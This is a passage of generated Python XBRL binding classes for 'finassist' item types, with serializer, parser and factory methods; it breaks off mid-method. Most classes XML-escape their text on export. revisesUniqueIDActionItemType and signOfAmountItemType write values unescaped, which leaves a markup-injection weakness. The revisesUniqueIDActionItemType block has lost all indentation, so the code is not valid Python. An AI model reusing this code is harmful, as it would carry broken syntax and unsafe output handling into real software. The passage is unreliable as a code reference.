    def export(self, outfile, level, namespace_='finassist:', name_='documentTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='documentTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='documentTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='documentTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(documentTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='documentTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='documentTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(documentTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(documentTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class documentTypeItemType
class invoiceTypeItemType(tokenItemType):
    """Binding class for the XBRL 'invoiceTypeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(invoiceTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if invoiceTypeItemType.subclass:
            return invoiceTypeItemType.subclass(*args_, **kwargs_)
        else:
            return invoiceTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(invoiceTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='invoiceTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='invoiceTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='invoiceTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='invoiceTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(invoiceTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='invoiceTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='invoiceTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(invoiceTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(invoiceTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class invoiceTypeItemType
class entriesTypeItemType(tokenItemType):
    """Binding class for the XBRL 'entriesTypeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(entriesTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if entriesTypeItemType.subclass:
            return entriesTypeItemType.subclass(*args_, **kwargs_)
        else:
            return entriesTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(entriesTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='entriesTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='entriesTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='entriesTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='entriesTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(entriesTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='entriesTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='entriesTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(entriesTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(entriesTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class entriesTypeItemType
class entryTypeItemType(tokenItemType):
    """Binding class for the XBRL 'entryTypeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(entryTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if entryTypeItemType.subclass:
            return entryTypeItemType.subclass(*args_, **kwargs_)
        else:
            return entryTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(entryTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='entryTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='entryTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='entryTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='entryTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(entryTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='entryTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='entryTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(entryTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(entryTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class entryTypeItemType
class identifierTypeItemType(tokenItemType):
    """Binding class for the XBRL 'identifierTypeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(identifierTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if identifierTypeItemType.subclass:
            return identifierTypeItemType.subclass(*args_, **kwargs_)
        else:
            return identifierTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(identifierTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='identifierTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='identifierTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='identifierTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='identifierTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(identifierTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='identifierTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='identifierTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(identifierTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(identifierTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class identifierTypeItemType
class mainAccountTypeItemType(tokenItemType):
    """Binding class for the XBRL 'mainAccountTypeItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(mainAccountTypeItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if mainAccountTypeItemType.subclass:
            return mainAccountTypeItemType.subclass(*args_, **kwargs_)
        else:
            return mainAccountTypeItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(mainAccountTypeItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='mainAccountTypeItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='mainAccountTypeItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='mainAccountTypeItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='mainAccountTypeItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(mainAccountTypeItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='mainAccountTypeItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='mainAccountTypeItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(mainAccountTypeItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(mainAccountTypeItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class mainAccountTypeItemType
class postingStatusItemType(tokenItemType):
    """Binding class for the XBRL 'postingStatusItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(postingStatusItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if postingStatusItemType.subclass:
            return postingStatusItemType.subclass(*args_, **kwargs_)
        else:
            return postingStatusItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(postingStatusItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='postingStatusItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='postingStatusItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='postingStatusItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='postingStatusItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(postingStatusItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='postingStatusItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='postingStatusItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(postingStatusItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(postingStatusItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class postingStatusItemType
class qualifierEntryItemType(tokenItemType):
    """Binding class for the XBRL 'qualifierEntryItemType' element: simple
    token content plus the id/contextRef attributes inherited from tokenItemType.
    """
    subclass = None
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        # original_tagname_ overrides name_ in export() when it is not None.
        self.original_tagname_ = None
        super(qualifierEntryItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        # Honor a user-installed subclass override, if any.
        if qualifierEntryItemType.subclass:
            return qualifierEntryItemType.subclass(*args_, **kwargs_)
        else:
            return qualifierEntryItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when there is text content here or in the superclass.
        if (
            self.valueOf_ or
            super(qualifierEntryItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='qualifierEntryItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML, indented to level."""
        from xml.sax.saxutils import escape
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='qualifierEntryItemType')
        if self.hasContent_():
            outfile.write('>')
            # Fix: XML-escape the character data ('&', '<', '>') so that
            # values containing markup characters cannot emit malformed XML.
            outfile.write(escape(str(self.valueOf_)).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='qualifierEntryItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='qualifierEntryItemType'):
        # All attributes come from tokenItemType; delegate upward.
        super(qualifierEntryItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='qualifierEntryItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='qualifierEntryItemType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate upward with fromsubclass_=True.
        super(qualifierEntryItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from an ElementTree node and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(qualifierEntryItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple type: no child elements to build.
        pass
# end class qualifierEntryItemType
class revisesUniqueIDActionItemType(tokenItemType):
subclass = None
superclass = tokenItemType
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
super(revisesUniqueIDActionItemType, self).__init__(id, contextRef, valueOf_, )
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if revisesUniqueIDActionItemType.subclass:
return revisesUniqueIDActionItemType.subclass(*args_, **kwargs_)
else:
return revisesUniqueIDActionItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_ or
super(revisesUniqueIDActionItemType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='revisesUniqueIDActionItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='revisesUniqueIDActionItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='revisesUniqueIDActionItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='revisesUniqueIDActionItemType'):
super(revisesUniqueIDActionItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='revisesUniqueIDActionItemType')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='revisesUniqueIDActionItemType', fromsubclass_=False, pretty_print=True):
super(revisesUniqueIDActionItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
    def buildAttributes(self, node, attrs, already_processed):
        # Attribute parsing is handled entirely by the tokenItemType base class.
        super(revisesUniqueIDActionItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Token items carry no child elements; nothing to build.
        pass
# end class revisesUniqueIDActionItemType
class signOfAmountItemType(tokenItemType):
    """Generated XBRL binding for the finassist ``signOfAmountItemType`` element.

    A token item: a single text value (``valueOf_``) with attributes
    (``id``, ``contextRef``) handled by the ``tokenItemType`` base class.
    Generated serializer code -- statement order produces the exact XML
    bytes, so edits must preserve output byte-for-byte.
    """
    subclass = None  # optional override class used by factory()
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        super(signOfAmountItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if signOfAmountItemType.subclass:
            return signOfAmountItemType.subclass(*args_, **kwargs_)
        else:
            return signOfAmountItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        # True when local text or base-class state is present.
        if (
            self.valueOf_ or
            super(signOfAmountItemType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='signOfAmountItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Write this element to outfile: open tag, attributes, text, children, close tag."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='signOfAmountItemType')
        if self.hasContent_():
            outfile.write('>')
            # NOTE(review): .encode() returns bytes -- Python 2-era idiom;
            # under Python 3 outfile must accept bytes. Confirm target runtime.
            outfile.write(str(self.valueOf_).encode(ExternalEncoding))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='signOfAmountItemType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='signOfAmountItemType'):
        super(signOfAmountItemType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='signOfAmountItemType')
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='signOfAmountItemType', fromsubclass_=False, pretty_print=True):
        super(signOfAmountItemType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
        pass
    def build(self, node):
        """Populate this instance from an XML element node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(signOfAmountItemType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Token items carry no child elements.
        pass
# end class signOfAmountItemType
class sourceJournalIDItemType(tokenItemType):
    """Generated XBRL binding for the finassist ``sourceJournalIDItemType`` element.

    A token item: a single text value (``valueOf_``) with attributes
    (``id``, ``contextRef``) handled by the ``tokenItemType`` base class.
    Generated serializer code -- statement order produces the exact XML
    bytes, so edits must preserve output byte-for-byte.
    """
    subclass = None  # optional override class used by factory()
    superclass = tokenItemType
    def __init__(self, id=None, contextRef=None, valueOf_=None):
        self.original_tagname_ = None  # tag seen at parse time; overrides name_ on export
        super(sourceJournalIDItemType, self).__init__(id, contextRef, valueOf_, )
        self.valueOf_ = valueOf_  # element text content
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        if sourceJournalIDItemType.subclass:
            return sourceJournalIDItemType.subclass(*args_, **kwargs_)
        else:
            return sourceJournalIDItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
